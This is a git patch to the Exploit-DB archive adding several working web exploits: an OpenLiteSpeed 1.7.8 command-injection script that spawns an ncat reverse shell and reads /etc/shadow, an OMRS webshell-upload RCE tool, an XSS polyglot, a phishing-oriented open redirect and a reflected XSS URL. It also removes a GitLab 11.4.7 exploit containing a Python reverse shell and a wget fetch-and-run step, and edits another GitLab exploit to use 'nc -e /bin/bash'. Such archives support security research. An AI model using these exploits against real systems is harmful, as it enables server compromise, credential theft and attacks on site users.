From b96bdbcfa593249b592c2a3695ce9bb0f538d44b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 12 Feb 2021 05:01:57 +0000 Subject: [PATCH] DB: 2021-02-12 8 changes to exploits/shellcodes Online Marriage Registration System 1.0 - Remote Code Execution Online Marriage Registration System 1.0 - Remote Code Execution (1) Gitlab 11.4.7 - Remote Code Execution GitLab 11.4.7 - Remote Code Execution (Authenticated) (1) Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated) Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (2) GitLab 11.4.7 - Remote Code Execution (Authenticated) GitLab 11.4.7 - RCE (Authenticated) GitLab 11.4.7 - RCE (Authenticated) (2) Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) (1) PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting b2evolution 6.11.6 - 'redirect_to' Open Redirect b2evolution 6.11.6 - 'tab3' Reflected XSS Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2) Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3) --- exploits/multiple/webapps/49556.py | 142 ++++++++++++++++ exploits/php/webapps/49553.txt | 19 +++ exploits/php/webapps/49554.txt | 16 ++ exploits/php/webapps/49555.txt | 16 ++ exploits/php/webapps/49557.py | 79 +++++++++ exploits/ruby/webapps/49263.py | 262 ----------------------------- exploits/ruby/webapps/49334.py | 10 +- files_exploits.csv | 16 +- 8 files changed, 287 insertions(+), 273 deletions(-) create mode 100755 exploits/multiple/webapps/49556.py create mode 100644 exploits/php/webapps/49553.txt create mode 100644 exploits/php/webapps/49554.txt create mode 100644 exploits/php/webapps/49555.txt create mode 100755 exploits/php/webapps/49557.py delete mode 100755 exploits/ruby/webapps/49263.py diff --git a/exploits/multiple/webapps/49556.py b/exploits/multiple/webapps/49556.py new file mode 100755 index 000000000..221317226 --- /dev/null +++ b/exploits/multiple/webapps/49556.py @@ -0,0 +1,142 @@ +# Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2) +# Date: 26/1/2021 +# Exploit Author: Metin Yunus Kandemir +# Discovered by: cmOs - SunCSR +# Vendor Homepage: https://openlitespeed.org/ +# Software Link: https://openlitespeed.org/kb/install-from-binary/ +# Version: 1.7.8 + +import requests +import sys +import urllib3 +from bs4 import BeautifulSoup + +""" +Description: +The "path" parameter has command injection vulnerability that leads to escalate privilege. +OpenLiteSpeed (1.7.8) web server runs with user(nobody):group(nogroup) privilege. However, extUser and +extGroup parameters could be used to join a group (GID) such as shadow, sudo, etc. +Details: https://github.com/litespeedtech/openlitespeed/issues/217 +Example: +Step-1: +ubuntu@ubuntu:~$ cat /etc/shadow +cat: /etc/shadow: Permission denied +Step-2: +ubuntu@ubuntu:~$ nc -nvlp 4444 +Listening on [0.0.0.0] (family 0, port 4444) +Step-3: +ubuntu@ubuntu:~/Desktop/exploits$ python3 openlitespeed.py 192.168.1.116:7080 admin MWE1ZmE2 shadow +[+] Authentication was successful! +[+] Version is detected: OpenLiteSpeed 1.7.8 +[+] The target is vulnerable! +[+] tk value is obtained: 0.98296300 1612966522 +[+] Sending reverse shell to 127.0.0.1:4444 ... +[+] Triggering command execution... +Step-4: +ubuntu@ubuntu:~$ nc -nvlp 4444 +Listening on [0.0.0.0] (family 0, port 4444) +Connection from 127.0.0.1 54534 received! +cat /etc/shadow +root:!:18620:0:99999:7::: +daemon:*:17937:0:99999:7::: +bin:*:17937:0:99999:7::: +sys:*:17937:0:99999:7::: +sync:*:17937:0:99999:7::: +. +. +. +""" + +def triggerCommandExec(target, s): + data = {"act" : "restart"} + trigger = s.post("https://"+target+"/view/serviceMgr.php", data = data, allow_redirects=False, verify=False) + if trigger.status_code == 200: + print("[+] Triggering command execution...") + else: + print("[-] Someting went wrong!") + +def commandExec(tk, groupId, s, target): + data = { + "name" : "lsphp", + "address" : "uds://tmp/lshttpd/lsphp.sock", + "note" : "", + "maxConns" : "10", + "env" : "PHP_LSAPI_CHILDREN=10", + "initTimeout" : "60", + "retryTimeout" : "0", + "persistConn" : "1", + "pcKeepAliveTimeout" : "", + "respBuffer" : "0", + "autoStart" : "2", + "path" : "/usr/bin/ncat -nv 127.0.0.1 4444 -e /bin/bash", + "backlog" : "100", + "instances" : "1", + "extUser" : "root", + "extGroup" : groupId , + "umask" : "", + "runOnStartUp" : "1", + "extMaxIdleTime" : "", + "priority" : "0", + "memSoftLimit" : "2047M", + "memHardLimit" : "2047M", + "procSoftLimit" : "1400", + "procHardLimit" : "", + "a" : "s", + "m" : "serv", + "p" : "ext", + "t" : "A_EXT_LSAPI", + "r" : "lsphp", + "tk" : tk + } + exec = s.post("https://" + target + "/view/confMgr.php", data = data, allow_redirects=False, verify=False) + + if exec.status_code == 200: + if exec.text == "Illegal entry point!": + print("[-] tk value is incorrect!") + sys.exit(1) + else: + print("[+] Sending reverse shell to 127.0.0.1:4444 ...") + else: + print("[-] Something went wrong!") + sys.exit(1) + + triggerCommandExec(target, s) + +def loginReq(target, username, password, groupId): + urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + s = requests.Session() + data = {"userid" : username , "pass" : password } + login = s.post("https://" + target + "/login.php" , data = data, allow_redirects=False, verify=False) + + if login.status_code == 302: + print("[+] Authentication was successful!") + elif login.status_code == 200: + print("[-] Authentication was unsuccessful!") + sys.exit(1) + else: + print("[-] Connection error!") + sys.exit(1) + + version = s.get("https://" + target + "/index.php") + versionSource = BeautifulSoup(version.text, "html.parser") + v = versionSource.find('div', {'class':'project-context hidden-xs'}).text + print("[+] Version is detected: OpenLiteSpeed %s" %(v.split()[2])) + if v.split()[2] == "1.7.8": + print("[+] The target is vulnerable!") + + #getting tk value + getTk = s.get("https://" + target + "/view/confMgr.php?m=serv&p=ext") + source = BeautifulSoup(getTk.text, 'html.parser') + tk = source.find('input', {'name':'tk'}).get('value') + print("[+] tk value is obtained: "+tk) + commandExec(tk, groupId, s, target) + +def main(args): + if len(args) != 5: + print("usage: %s targetIp:port username password groupId " %(args[0])) + print("Example: python3 openlitespeed.py 192.168.1.116:7080 admin MWE1ZmE2 shadow") + sys.exit(1) + loginReq(target=args[1], username=args[2], password=args[3], groupId=args[4]) + +if __name__ == "__main__": + main(args=sys.argv) \ No newline at end of file diff --git a/exploits/php/webapps/49553.txt b/exploits/php/webapps/49553.txt new file mode 100644 index 000000000..b78838883 --- /dev/null +++ b/exploits/php/webapps/49553.txt @@ -0,0 +1,19 @@ +# Exploit Title: PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting +# Date: 2021-02-11 +# Exploit Author: Anmol K Sachan +# Vendor Homepage: https://www.peel.fr/ +# Software Link: https://sourceforge.net/projects/peel-shopping/ +# Software: : PEEL SHOPPING 9.3.0 +# Vulnerability Type: Stored Cross-site Scripting +# Vulnerability: Stored XSS +# Tested on Windows 10 XAMPP +# This application is vulnerable to Stored XSS vulnerability. +# Vulnerable script: http://localhost/peel-shopping_9_3_0/utilisateurs/change_params.php +# Vulnerable parameters: 'Address' +# Payload used: + +jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() +)//%0D%0A%0d%0a//\x3csVg/\x3e + +# POC: in the same page where we injected payload click on the text box to edit the address. +# You will see your Javascript code (XSS) executed. \ No newline at end of file diff --git a/exploits/php/webapps/49554.txt b/exploits/php/webapps/49554.txt new file mode 100644 index 000000000..2c54eb41b --- /dev/null +++ b/exploits/php/webapps/49554.txt @@ -0,0 +1,16 @@ +# Exploit Title: b2evolution 6.11.6 - 'redirect_to' Open Redirect +# Date: 10/02/2021 +# Exploit Author: Soham Bakore, Nakul Ratti +# Vendor Homepage: https://b2evolution.net/ +# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405 +# Version: 6.11.6 +# Tested on: latest version of Chrome, Firefox on Windows and Linux +# CVE : CVE-2020-22840 + + +--------------------------Proof of Concept----------------------- + + +1. Send the following link : http://127.0.0.1/htsrv/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fgoogle.com to the unsuspecting user +2. The user will be redirected to Google.com or any other attacker controlled domain +3. This can be used to perform malicious phishing campaigns on unsuspecting users \ No newline at end of file diff --git a/exploits/php/webapps/49555.txt b/exploits/php/webapps/49555.txt new file mode 100644 index 000000000..d69ff844f --- /dev/null +++ b/exploits/php/webapps/49555.txt @@ -0,0 +1,16 @@ +# Exploit Title: b2evolution 6.11.6 - 'tab3' Reflected XSS +# CVE: CVE-2020-22839 +# Date: 10/02/2021 +# Exploit Author: Nakul Ratti, Soham Bakore +# Vendor Homepage: https://b2evolution.net/ +# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405 +# Version: 6.11.6 +# Tested on: latest version of Chrome, Firefox on Windows and Linux + +--------------------------Proof of Concept----------------------- + +Steps to Reproduce: + +1. Send the following URL http://HOST/evoadm.php?.ctrl=comments&filter=restore&tab3=123%22onmouseover=%22alert(document.domain)%22&blog=1&blog=1 to the logged in victim using any social engineering technique. +2. When an unsuspecting user with high privileges opens this URL, XSS will be triggered  which will execute the malicious javascript payload in users browser. +3. The vulnerable parameter in this case is “tab3”. \ No newline at end of file diff --git a/exploits/php/webapps/49557.py b/exploits/php/webapps/49557.py new file mode 100755 index 000000000..738fd2517 --- /dev/null +++ b/exploits/php/webapps/49557.py @@ -0,0 +1,79 @@ +# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3) +# Date: 10/02/2021 +# Exploit Author: Ricardo Ruiz (@ricardojoserf) +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ +# Version: 1.0 +# Tested on: Windows 10/Xampp Server and Wamp Server +# Porting an existing exploit (https://www.exploit-db.com/exploits/49260, for macOs) to Linux/Windows. Adding the possibility of automatic registration and execution of any command without needing to upload any local file +# Example with registration: python3 script.py -u http://172.16.1.102:80/ -c 'whoami' +# Example without registration: python3 script.py -u http://172.16.1.102:80/ -c 'whoami' -m 680123456 -p dante123 + +import os +import sys +import random +import argparse +import requests + + +def get_args(): + parser = argparse.ArgumentParser() + parser.add_argument('-u', '--url', required=True, action='store', help='Url of Online Marriage Registration System (OMRS) 1.0') + parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute') + parser.add_argument('-m', '--mobile', required=False, action='store', help='Mobile phone used for registration') + parser.add_argument('-p', '--password', required=False, action='store', help='Password used for registration') + my_args = parser.parse_args() + return my_args + + +def login(url, mobile, password): + url = "%s/user/login.php"%(url) + payload = {'mobno':mobile, 'password':password, 'login':''} + req = requests.post(url, data=payload) + return req.cookies['PHPSESSID'] + + +def upload(url, cookie, file=None): + url = "%s/user/marriage-reg-form.php"%url + files = {'husimage': ('shell.php', "", 'application/x-php', {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')} + payload = {'dom':'05/01/2020','nofhusband':'omrs_rce', 'hreligion':'omrs_rce', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'omrs_rce','hzipcode':'omrs_rce','hstate':'omrs_rce','hadharno':'omrs_rce','nofwife':'omrs_rce','wreligion':'omrs_rce','wsbmarriage':'Bachelor','waddress':'omrs_rce','wzipcode':'omrs_rce','wstate':'omrs_rce','wadharno':'omrs_rce','witnessnamef':'omrs_rce','waddressfirst':'omrs_rce','witnessnames':'omrs_rce','waddresssec':'omrs_rce','witnessnamet':'omrs_rce','waddressthird':'omrs_rce','submit':''} + req = requests.post(url, data=payload, cookies={'PHPSESSID':cookie}, files=files) + print('[+] PHP shell uploaded') + + +def get_remote_php_files(url): + url = "%s/user/images"%(url) + req = requests.get(url) + php_files = [] + for i in req.text.split(".php"): + php_files.append(i[-42:]) + return php_files + + +def exec_command(url, webshell, command): + url_r = "%s/user/images/%s?cmd=%s"%(url, webshell, command) + req = requests.get(url_r) + print("[+] Command output\n%s"%(req.text)) + + +def register(mobile, password, url): + url_r = "%s/user/signup.php"%(url) + data = {"fname":"omrs_rce", "lname":"omrs_rce", "mobno":mobile, "address":"omrs_rce", "password":password, "submit":""} + req = requests.post(url_r, data=data) + print("[+] Registered with mobile phone %s and password '%s'"%(mobile,password)) + + +if __name__ == "__main__": + args = get_args() + url = args.url + command = args.command + mobile = str(random.randint(100000000,999999999)) if args.mobile is None else args.mobile + password = "dante123" if args.password is None else args.password + if args.password is None or args.mobile is None: + register(mobile,password,url) + cookie = login(url, mobile, password) + initial_php_files = get_remote_php_files(url) + upload(url, cookie) + final_php_files = get_remote_php_files(url) + webshell = (list(set(final_php_files) - set(initial_php_files))[0]+".php") + exec_command(url,webshell,command) \ No newline at end of file diff --git a/exploits/ruby/webapps/49263.py b/exploits/ruby/webapps/49263.py deleted file mode 100755 index 792c682a8..000000000 --- a/exploits/ruby/webapps/49263.py +++ /dev/null @@ -1,262 +0,0 @@ -# Exploit Title: GitLab 11.4.7 Authenticated Remote Code Execution (No Interaction Required) -# Date: 15th December 2020 -# Exploit Author: Mohin Paramasivam (Shad0wQu35t) -# Software Link: https://about.gitlab.com/ -# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/ -# Tested on: GitLab 11.4.7 CE -# CVE : CVE-2018-19571 (SSRF),CVE-2018-19585 (CRLF) - -import requests -import re -import warnings -from bs4 import BeautifulSoup -import sys -import base64 -import urllib -from random_words import RandomWords -import argparse -import os -import time - - - - -parser = argparse.ArgumentParser(description='GitLab 11.4.7 Authenticated RCE') -parser.add_argument('-U',help='GitLab Username') -parser.add_argument('-P',help='Gitlab Password') -parser.add_argument('-l',help='rev shell lhost') -parser.add_argument('-p',help='rev shell lport ',type=int) -args = parser.parse_args() - - -username = args.U -password = args.P -lhost = args.l -lport = args.p - - -#Retrieve CSRF Token - -warnings.filterwarnings("ignore", category=UserWarning, module='bs4') -gitlab_url = "http://10.129.49.62:5080" -request = requests.Session() -print("[+] Retrieving CSRF token to submit the login form") -time.sleep(1) -page = request.get(gitlab_url+"/users/sign_in") -html_content = page.text -soup = BeautifulSoup(html_content,features="lxml") -token = soup.findAll('meta')[16].get("content") - - -print("[+] CSRF Token : "+token) -time.sleep(1) - - -#Login - -login_info ={ - "authenticity_token": token, - "user[login]": username, - "user[password]": password, - "user[remember_me]": "0" -} - - -login_request = request.post(gitlab_url+"/users/sign_in",login_info) - - -if login_request.status_code==200: - print("[+] Login Successful") - time.sleep(1) - -else: - - print("Login Failed") - print(" ") - sys.exit() - - - - -#Exploitation - -print("[+] Running Exploit") -time.sleep(1) -print("[+] Using IPV6 URL 'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git' to bypass filter") -time.sleep(1) - -ipv6_url = "git%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest%2Fssrf.git" - - -r = RandomWords() -project_name = r.random_word() -project_url = '%s/%s/'%(gitlab_url,username) - -print("[+] Creating Project") -time.sleep(1) -print("[+] Project Name : "+project_name) -time.sleep(1) - -print("[+] Creating Python Reverse Shell") -time.sleep(1) - - -python_shell = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'%(lhost,lport) - - -os.system("touch shell.py") -shell_file = open("shell.py","w") -shell_file.write(python_shell) -shell_file.close() - - -print("[+] Reverse Shell Generated") -time.sleep(1) - -print("[+] Start HTTP Server in current directory") - - -print("Command : python3 -m http.server 80") -time.sleep(2) - -http_server = raw_input("Continue (Y/N) : ") - -if (http_server=="N") or (http_server=="n"): - print("Start HTTP Server before running exploit") - -elif (http_server=="Y") or (http_server=="y"): - - - - print("Run this script twice with options below to get SHELL!") - print("") - print("Option 1 : Download shell.py rev shell to server using wget") - print("Option 2 : Execute shell.py downloaded previously") - - option = raw_input("Option (1/2) : ") - - - if option=="1": - - - - reverse_shell= """\nmulti - sadd resque:gitlab:queues system_hook_push - lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid wget http://%s/shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}" - exec - exec - exec\n""" %(lhost) - - - project_page = request.get(gitlab_url+"/projects/new") - html_content = project_page.text - soup = BeautifulSoup(html_content,features="lxml") - project_token = soup.findAll('meta')[16].get("content") - namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value') - urlencoded_token1 = project_token.replace("==","%3D%3D") - urlencoded_token_final = urlencoded_token1.replace("+","%2B") - - - payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name) - - - - - - - proxies = { - "http" : "http://127.0.0.1:8080", - "https" : "https://127.0.0.1:8080", - } - - cookies = { - 'sidebar_collapsed': 'false', - 'event_filter': 'all', - 'hide_auto_devops_implicitly_enabled_banner_1': 'false', - '_gitlab_session':request.cookies['_gitlab_session'], - } - - headers = { - 'Host': '10.129.49.31:5080', - 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0', - 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Accept-Language': 'en-US,en;q=0.5', - 'Accept-Encoding': 'gzip, deflate', - 'Referer': 'http://10.129.49.31:5080/projects', - 'Content-Type': 'application/x-www-form-urlencoded', - 'Content-Length': '398', - 'Connection': 'close', - 'Upgrade-Insecure-Requests': '1', - } - - - - #response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False) - - response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False) - print("[+] Success!") - time.sleep(1) - print("[+] Run Exploit with Option 2") - - - elif option=="2": - - reverse_shell= """\nmulti - sadd resque:gitlab:queues system_hook_push - lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid python3 shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}" - exec - exec - exec\n""" - - - - - project_page = request.get(gitlab_url+"/projects/new") - html_content = project_page.text - soup = BeautifulSoup(html_content,features="lxml") - project_token = soup.findAll('meta')[16].get("content") - namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value') - urlencoded_token1 = project_token.replace("==","%3D%3D") - urlencoded_token_final = urlencoded_token1.replace("+","%2B") - - - payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name) - - - - - - - proxies = { - "http" : "http://127.0.0.1:8080", - "https" : "https://127.0.0.1:8080", - } - - cookies = { - 'sidebar_collapsed': 'false', - 'event_filter': 'all', - 'hide_auto_devops_implicitly_enabled_banner_1': 'false', - '_gitlab_session':request.cookies['_gitlab_session'], - } - - headers = { - 'Host': '10.129.49.31:5080', - 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0', - 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', - 'Accept-Language': 'en-US,en;q=0.5', - 'Accept-Encoding': 'gzip, deflate', - 'Referer': 'http://10.129.49.31:5080/projects', - 'Content-Type': 'application/x-www-form-urlencoded', - 'Content-Length': '398', - 'Connection': 'close', - 'Upgrade-Insecure-Requests': '1', - } - - - - #response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False) - - response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False) - print("[+] Success!") - time.sleep(1) - print("[+] Spawning Reverse Shell") \ No newline at end of file diff --git a/exploits/ruby/webapps/49334.py b/exploits/ruby/webapps/49334.py index 3f89b1cd5..f0e29ed1b 100755 --- a/exploits/ruby/webapps/49334.py +++ b/exploits/ruby/webapps/49334.py @@ -1,10 +1,10 @@ -# Exploit Title: GitLab 11.4.7 - RCE (Authenticated) +# Exploit Title: GitLab 11.4.7 RCE (POC) # Date: 24th December 2020 -# Exploit Author: Sam Redmond +# Exploit Author: Norbert Hofmann +# Original Exploit Authors: Sam Redmond, Tam Lai Yin # Software Link: https://gitlab.com/ # Environment: GitLab 11.4.7, community edition # CVE: CVE-2018-19571 + CVE-2018-19585 -# Version: 11.4.7 #!/usr/bin/python3 @@ -26,7 +26,7 @@ username = args.u password = args.p gitlab_url = args.g + ":5080" local_ip = args.l -local_port = args.p +local_port = args.P session = requests.Session() @@ -56,7 +56,7 @@ print(f"[+] Creating project with random name: {project_name}") form = """\nmulti sadd resque:gitlab:queues system_hook_push - lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|""" + f'nc {local_ip} {local_port}' + """ \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1608799993.1234567,\\"enqueued_at\\":1608799993.1234567}" + lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|""" + f'nc {local_ip} {local_port} -e /bin/bash' + """ \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1608799993.1234567,\\"enqueued_at\\":1608799993.1234567}" exec exec exec\n""" diff --git a/files_exploits.csv b/files_exploits.csv index 31e8df392..e89ef55e2 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -43231,7 +43231,7 @@ id,file,description,date,author,type,platform,port 48549,exploits/java/webapps/48549.py,"VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-04,"Tomas Melicher",webapps,java, 48550,exploits/php/webapps/48550.txt,"Navigate CMS 2.8.7 - Authenticated Directory Traversal",2020-06-04,"Gus Ralph",webapps,php, 48551,exploits/hardware/webapps/48551.txt,"D-Link DIR-615 T1 20.10 - CAPTCHA Bypass",2020-06-04,"huzaifa hussain",webapps,hardware, -48552,exploits/php/webapps/48552.sh,"Online Marriage Registration System 1.0 - Remote Code Execution",2020-06-04,Enesdex,webapps,php, +48552,exploits/php/webapps/48552.sh,"Online Marriage Registration System 1.0 - Remote Code Execution (1)",2020-06-04,Enesdex,webapps,php, 48553,exploits/multiple/webapps/48553.txt,"Cayin Content Management Server 11.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple, 48554,exploits/hardware/webapps/48554.txt,"SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User)",2020-06-04,LiquidWorm,webapps,hardware, 48556,exploits/hardware/webapps/48556.txt,"Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read",2020-06-04,LiquidWorm,webapps,hardware, @@ -43524,11 +43524,10 @@ id,file,description,date,author,type,platform,port 49254,exploits/multiple/webapps/49254.txt,"Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple, 49255,exploits/multiple/webapps/49255.txt,"Rumble Mail Server 0.51.3135 - 'username' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple, 49256,exploits/hardware/webapps/49256.py,"Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation",2020-12-14,"Maximilian Barz",webapps,hardware, -49257,exploits/ruby/webapps/49257.py,"Gitlab 11.4.7 - Remote Code Execution",2020-12-14,"Fortunato Lodari",webapps,ruby, +49257,exploits/ruby/webapps/49257.py,"GitLab 11.4.7 - Remote Code Execution (Authenticated) (1)",2020-12-14,"Fortunato Lodari",webapps,ruby, 49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php, -49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)",2020-12-15,"Andrea Bruschi",webapps,php, +49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (2)",2020-12-15,"Andrea Bruschi",webapps,php, 49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware, -49263,exploits/ruby/webapps/49263.py,"GitLab 11.4.7 - Remote Code Execution (Authenticated)",2020-12-16,"Mohin Paramasivam",webapps,ruby, 49264,exploits/php/webapps/49264.txt,"Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting",2020-12-16,"Sagar Banwa",webapps,php, 49265,exploits/linux/webapps/49265.txt,"Raysync 3.3.3.8 - RCE",2020-12-16,james,webapps,linux, 49266,exploits/android/webapps/49266.py,"Magic Home Pro 1.5.1 - Authentication Bypass",2020-12-16,"Victor Hanna",webapps,android, @@ -43585,7 +43584,7 @@ id,file,description,date,author,type,platform,port 49331,exploits/php/webapps/49331.txt,"Baby Care System 1.0 - 'roleid' SQL Injection",2020-12-23,"Vijay Sachdeva",webapps,php, 49332,exploits/php/webapps/49332.txt,"WordPress Plugin Adning Advertising 1.5.5 - Arbitrary File Upload",2020-12-24,spacehen,webapps,php, 49333,exploits/php/webapps/49333.txt,"WordPress Plugin WP-PostRatings 1.86 - 'postratings_image' Cross-Site Scripting",2020-12-24,"Park Won Seok",webapps,php, -49334,exploits/ruby/webapps/49334.py,"GitLab 11.4.7 - RCE (Authenticated)",2020-12-24,"Sam Redmond",webapps,ruby, +49334,exploits/ruby/webapps/49334.py,"GitLab 11.4.7 - RCE (Authenticated) (2)",2020-12-24,"Norbert Hofmann",webapps,ruby, 49338,exploits/php/webapps/49338.txt,"Wordpress Core 5.2.2 - 'post previews' XSS",2021-01-04,gx1,webapps,php, 49339,exploits/php/webapps/49339.txt,"4images v1.7.11 - 'Profile Image' Stored Cross-Site Scripting",2021-01-04,"Ritesh Gohil",webapps,php, 49340,exploits/php/webapps/49340.py,"Mantis Bug Tracker 2.24.3 - 'access' SQL Injection",2021-01-04,EthicalHCOP,webapps,php, @@ -43690,7 +43689,7 @@ id,file,description,date,author,type,platform,port 49477,exploits/php/webapps/49477.txt,"Simple College Website 1.0 - 'full' Stored Cross Site Scripting",2021-01-26,"Marco Catalano",webapps,php, 49478,exploits/hardware/webapps/49478.txt,"Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting",2021-01-26,"Chiragh Arora",webapps,hardware, 49479,exploits/java/webapps/49479.py,"Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)",2021-01-26,CHackA0101,webapps,java, -49483,exploits/multiple/webapps/49483.txt,"Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated)",2021-01-27,SunCSR,webapps,multiple, +49483,exploits/multiple/webapps/49483.txt,"Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) (1)",2021-01-27,SunCSR,webapps,multiple, 49481,exploits/ruby/webapps/49481.txt,"STVS ProVision 5.9.10 - File Disclosure (Authenticated)",2021-01-27,LiquidWorm,webapps,ruby, 49482,exploits/ruby/webapps/49482.html,"STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)",2021-01-27,LiquidWorm,webapps,ruby, 49484,exploits/php/webapps/49484.txt,"EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting",2021-01-28,"Mahendra Purbia",webapps,php, @@ -43742,3 +43741,8 @@ id,file,description,date,author,type,platform,port 49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple, 49551,exploits/php/webapps/49551.txt,"b2evolution 6.11.6 - 'plugin name' Stored XSS",2021-02-10,"Soham Bakore",webapps,php, 49552,exploits/nodejs/webapps/49552.py,"Node.JS - 'node-serialize' Remote Code Execution (2)",2021-02-10,UndeadLarva,webapps,nodejs, +49553,exploits/php/webapps/49553.txt,"PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting",2021-02-11,"Anmol K Sachan",webapps,php, +49554,exploits/php/webapps/49554.txt,"b2evolution 6.11.6 - 'redirect_to' Open Redirect",2021-02-11,"Nakul Ratti",webapps,php, +49555,exploits/php/webapps/49555.txt,"b2evolution 6.11.6 - 'tab3' Reflected XSS",2021-02-11,"Nakul Ratti",webapps,php, +49556,exploits/multiple/webapps/49556.py,"Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)",2021-02-11,"Metin Yunus Kandemir",webapps,multiple, +49557,exploits/php/webapps/49557.py,"Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)",2021-02-11,"Ricardo Ruiz",webapps,php,